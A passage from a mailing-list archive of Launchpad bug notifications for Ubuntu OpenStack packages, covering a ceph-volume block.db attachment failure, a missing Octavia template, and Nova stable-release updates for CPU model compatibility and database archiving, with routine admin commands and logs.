1 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 253:10 what happens when I try to add a new block.db to an OSD: root at op1:~# ceph-volume lvm new-db --osd-id 42 --osd-fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c --target vol_db/c1 --no-systemd --> Making new volume at /dev/vol_db/c1 for OSD: 42 (/var/lib/ceph/osd/ceph-42) stdout: inferring bluefs devices from bluestore path stderr: Might need DB size specification, please set Ceph bluestore-block-db-size config parameter --> failed to attach new volume, error code:1 --> Undoing lv tag set Failed to attach new volume: vol_db/c1 after that, even the error, osd.42 seems to have a block.db root at op1:~# ceph-volume lvm list 42 ====== osd.42 ====== [block] /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd- block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block device /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block uuid Li93WA-x5oR-rep1-21D1-sJ9m-4lII-msenUU cephx lockbox secret cluster fsid 7dfd9e3a-a5b6-11ee-9798-619012c1bb3a cluster name ceph crush device class db device /dev/vol_db/c1 db uuid l10sEJ-a3Gt-m8AK-eXA6-qTJW-82su-VngPmP encrypted 0 osd fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c osd id 42 osdspec affinity type block vdo 0 devices /dev/sdc but block.db doesn't exist and from now, when restarting osd.42 it always fails. The only solution is remove osd.42 and re-create it with block.db, but ceph takes a lot of time to recover from the disk delete/create commands ** Affects: ceph (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2075541 Title: ceph-volume lvm new-db requires 'bluestore-block-db-size' parameter Status in ceph package in Ubuntu: New Bug description: when trying to add a new-db to an existing LVM OSD, ceph-volume lvm new-db fails requiring 'bluestore-block-db-size' parameter even this bug should be resolved by https://tracker.ceph.com/issues/55260 my env: root at op1:~# lsb_release -r Release: 22.04 root at op1:~# lsb_release -rd Description: Ubuntu 22.04.4 LTS Release: 22.04 ceph-volume 18.2.0-0ubuntu3~cloud0 lv db volume: root at op1:~# lvdisplay vol_db/c1 --- Logical volume --- LV Path /dev/vol_db/c1 LV Name c1 VG Name vol_db LV UUID uCv6n3-Wa0H-0DaO-GGsc-Wa4c-VLfb-7KqG7X LV Write Access read/write LV Creation host, time op1.maas, 2024-08-01 16:27:22 +0000 LV Status available # open 0 LV Size 166.00 GiB Current LE 42496 Segments 1 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 253:10 what happens when I try to add a new block.db to an OSD: root at op1:~# ceph-volume lvm new-db --osd-id 42 --osd-fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c --target vol_db/c1 --no-systemd --> Making new volume at /dev/vol_db/c1 for OSD: 42 (/var/lib/ceph/osd/ceph-42) stdout: inferring bluefs devices from bluestore path stderr: Might need DB size specification, please set Ceph bluestore-block-db-size config parameter --> failed to attach new volume, error code:1 --> Undoing lv tag set Failed to attach new volume: vol_db/c1 after that, even the error, osd.42 seems to have a block.db root at op1:~# ceph-volume lvm list 42 ====== osd.42 ====== [block] /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd- block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block device /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block uuid Li93WA-x5oR-rep1-21D1-sJ9m-4lII-msenUU cephx lockbox secret cluster fsid 7dfd9e3a-a5b6-11ee-9798-619012c1bb3a cluster name ceph crush device class db device /dev/vol_db/c1 db uuid l10sEJ-a3Gt-m8AK-eXA6-qTJW-82su-VngPmP encrypted 0 osd fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c osd id 42 osdspec affinity type block vdo 0 devices /dev/sdc but block.db doesn't exist and from now, when restarting osd.42 it always fails. The only solution is remove osd.42 and re-create it with block.db, but ceph takes a lot of time to recover from the disk delete/create commands To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2075541/+subscriptions From 2072526 at bugs.launchpad.net Thu Aug 1 19:03:28 2024 From: 2072526 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 19:03:28 -0000 Subject: [Bug 2072526] Re: ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template References: <172048117744.1632970.14728166185672205369.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172253900828.1289263.11994448105645843570.malone@juju-98d295-prod-launchpad-3> Please include in the test plan a comparison of installed files by the package before the fix, and after the fix, to be sure we are not suddenly including something we shouldn't. ** Changed in: octavia (Ubuntu Noble) Status: Triaged => Fix Committed ** Tags added: verification-needed verification-needed-noble -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2072526 Title: ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template Status in OpenStack Octavia Charm: Invalid Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive caracal series: Triaged Status in octavia package in Ubuntu: Fix Released Status in octavia source package in Noble: Fix Committed Bug description: [ Impact ] Octavia fails to provision Amphora for load balancers. [ Test Plan ] Install Octavia as part of a Charmed OpenStack deployment for Caracal. Create a loadbalancer - creation will fail with stack trace from original bug report. [ Where problems could occur ] The fix for this is to ensure that data files in the Python source tree are included in the package installation; this is done by providing a MANIFEST to ensure that this happens; side effects are unlikely. [Original Bug Report] [Impact] Octavia fails to provision the amphora, the stacktrace logged is: Traceback (most recent call last):   File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 52, in _execute_task     result = task.execute(**arguments)   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 199, in execute     return super().execute(   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 122, in execute     agent_cfg = agent_jinja_cfg.AgentJinjaTemplater()   File "/usr/lib/python3/dist-packages/octavia/amphorae/backends/agent/agent_jinja_cfg.py", line 34, in __init__     self.agent_template = jinja_env.get_template(   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 997, in get_template     return self._load_template(name, globals)   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 958, in _load_template     template = self.loader.load(self, name, self.make_globals(globals))   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 125, in load     source, filename, uptodate = self.get_source(environment, name)   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 214, in get_source     raise TemplateNotFound(template) jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template When searching for a package where this file is, apt-file can't find any. https://packages.ubuntu.com/search?searchon=contents&keywords=amphora_agent_conf.template&mode=exactfilename&suite=noble&arch=any This file has been around for many years - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/templates/amphora_agent_conf.template - and the code that's trying to use it hasn't really received changes during the Caracal cycle - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/agent_jinja_cfg.py [Environment] * OpenStack 2024.1 (Caracal) * python3-octavia 1:14.0.0-0ubuntu1~cloud0 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-octavia/+bug/2072526/+subscriptions From 2072526 at bugs.launchpad.net Thu Aug 1 19:06:46 2024 From: 2072526 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 19:06:46 -0000 Subject: [Bug 2072526] Please test proposed package References: <172048117744.1632970.14728166185672205369.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172253920675.766651.12501859677778008949.malone@juju-98d295-prod-launchpad-2> Hello Felipe, or anyone else affected, Accepted octavia into noble-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/octavia/1:14.0.0-0ubuntu1.1 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- noble to verification-done-noble. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-noble. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2072526 Title: ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template Status in OpenStack Octavia Charm: Invalid Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive caracal series: Triaged Status in octavia package in Ubuntu: Fix Released Status in octavia source package in Noble: Fix Committed Bug description: [ Impact ] Octavia fails to provision Amphora for load balancers. [ Test Plan ] Install Octavia as part of a Charmed OpenStack deployment for Caracal. Create a loadbalancer - creation will fail with stack trace from original bug report. [ Where problems could occur ] The fix for this is to ensure that data files in the Python source tree are included in the package installation; this is done by providing a MANIFEST to ensure that this happens; side effects are unlikely. [Original Bug Report] [Impact] Octavia fails to provision the amphora, the stacktrace logged is: Traceback (most recent call last):   File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 52, in _execute_task     result = task.execute(**arguments)   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 199, in execute     return super().execute(   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 122, in execute     agent_cfg = agent_jinja_cfg.AgentJinjaTemplater()   File "/usr/lib/python3/dist-packages/octavia/amphorae/backends/agent/agent_jinja_cfg.py", line 34, in __init__     self.agent_template = jinja_env.get_template(   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 997, in get_template     return self._load_template(name, globals)   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 958, in _load_template     template = self.loader.load(self, name, self.make_globals(globals))   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 125, in load     source, filename, uptodate = self.get_source(environment, name)   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 214, in get_source     raise TemplateNotFound(template) jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template When searching for a package where this file is, apt-file can't find any. https://packages.ubuntu.com/search?searchon=contents&keywords=amphora_agent_conf.template&mode=exactfilename&suite=noble&arch=any This file has been around for many years - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/templates/amphora_agent_conf.template - and the code that's trying to use it hasn't really received changes during the Caracal cycle - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/agent_jinja_cfg.py [Environment] * OpenStack 2024.1 (Caracal) * python3-octavia 1:14.0.0-0ubuntu1~cloud0 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-octavia/+bug/2072526/+subscriptions From 1999814 at bugs.launchpad.net Thu Aug 1 19:34:52 2024 From: 1999814 at bugs.launchpad.net (Mauricio Faria de Oliveira) Date: Thu, 01 Aug 2024 19:34:52 -0000 Subject: [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com> Message-ID: <172254089274.1327209.5260804773523968901.malone@juju-98d295-prod-launchpad-3> Uploaded a combined SRU for Focal (ubuntu2.12) on top of the latest security update. Build-time test suite passes: ====== Totals ====== Ran: 17503 tests in 769.9099 sec. - Passed: 17448 - Skipped: 54 - Expected Fail: 1 - Unexpected Success: 0 - Failed: 0 Sum of execute time for each test: 3012.8493 sec. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/1999814 Title: [SRU] Allow for specifying common baseline CPU model with disabled feature Status in OpenStack Compute (nova): Expired Status in OpenStack Compute (nova) ussuri series: New Status in OpenStack Compute (nova) victoria series: Won't Fix Status in OpenStack Compute (nova) wallaby series: Won't Fix Status in OpenStack Compute (nova) xena series: Won't Fix Status in OpenStack Compute (nova) yoga series: New Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Won't Fix Status in nova source package in Focal: In Progress Status in nova source package in Jammy: In Progress Bug description: ******** SRU TEMPLATE AT THE BOTTOM ******* Hello, This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu- flags), but there is a very different and important nuance. A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server- noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs. Even if I specify the following in my nova.conf: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._compare_cpu(cpu, self._get_cpu_info(), None) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u}) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service service.start() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.manager.init_host() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.driver.init_host(host=self.host) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._check_cpu_compatibility() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(msg) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service If I make a custom libvirt CPU map file which removes the "" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this. Currently the only "proper" way I'm aware of to work around this right now is to fall back to a Broadwell-based configuration which lacks the "mpx" feature to use as a common baseline, but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common in both Cascade Lake and Ice Lake. I would rather if there were a way to use the Cascade Lake settings but simply remove that "mpx" feature from use. ---- Steps to reproduce ================== On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in nova.conf in libvirt settings: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx Then try to start nova. Expected result =============== Nova should start since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server- noTSX as a common baseline model for both Cascade Lake and Ice Lake servers. Actual result ============= Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help. Environment =========== Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2. Hypervisor: libvirt + KVM Other relevant notes ==================== There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily in regards to the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well. * https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead as it seems to more correctly identify the CPU model even if there are disabled flags like MPX. * https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu. =============== SRU Description =============== [Impact] When using IceLake CPUs alongside CascadeLake CPUs, the Nova code does not start due to comparing CPU models. It fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features. The Libvirt upstream team will not add specific support to IceLake [1]. The fix [2] in Nova is to ignore CPU check (as a configurable workaround) as let libvirt handle the added/removed flags, which is assumed to work for this specific case. [Test case] Due to not having Icelake and Cascadelake CPUs in our usual lab for testing of this specific scenario, the test case for this could be either: 1) run for this SRU is running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expect the test to pass. Test run evidence will be attached to LP. 2) manually deploy nova and the necessary openstack services to get Nova to the code point of validating the issue in a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need of other services (conductor, keystone, mysql, etc) but for a proper validation a clean installation (without any hackery) is considered mandatory. In such case, the test case would be: a) Deploy nova and required services in an IceLake machine b) Make sure the nova.conf has: cpu_mode = custom cpu_models = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, therefore presenting the error: 2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake- Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. d) Install package containing the fix and confirm the successful nova- compute service restart, not containing the error and containing this instead: 2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX [Regression Potential] There is 1 new behavior introduced and 1 changed. The behavior introduced is gated by a new config option that needs to be enabled, and when enabled, it skips running the code. The behavior changed is the one assumed by the default disabled value of the config option. The fact that the code being backported in Yoga-Ussuri is exactly the same as in currently Master (Caracal+), it means that no issues have been found with the code across 4 releases, giving some confidence that the code changed is unlikely to cause issues. [Other Info] [1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064 [2] https://review.opendev.org/c/openstack/nova/+/871969 To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions From 2024258 at bugs.launchpad.net Thu Aug 1 20:13:41 2024 From: 2024258 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:13:41 -0000 Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172254322204.860175.8486466079445438316.malone@juju-98d295-prod-launchpad-2> Hello melanie, or anyone else affected, Accepted nova into jammy-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/3:25.2.1-0ubuntu2.7 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- jammy to verification-done-jammy. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-jammy. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. ** Changed in: nova (Ubuntu Jammy) Status: In Progress => Fix Committed ** Tags added: verification-needed verification-needed-jammy ** Changed in: nova (Ubuntu Focal) Status: In Progress => Fix Committed ** Tags added: verification-needed-focal -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions From 2024258 at bugs.launchpad.net Thu Aug 1 20:15:19 2024 From: 2024258 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:15:19 -0000 Subject: [Bug 2024258] Please test proposed package References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172254331941.863444.8702009964003126543.malone@juju-98d295-prod-launchpad-2> Hello melanie, or anyone else affected, Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- focal to verification-done-focal. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-focal. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions From 1999814 at bugs.launchpad.net Thu Aug 1 20:12:53 2024 From: 1999814 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:12:53 -0000 Subject: [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com> Message-ID: <172254317336.1315154.13539235494381279840.malone@juju-98d295-prod-launchpad-7> Hello Paul, or anyone else affected, Accepted nova into jammy-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/3:25.2.1-0ubuntu2.7 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See 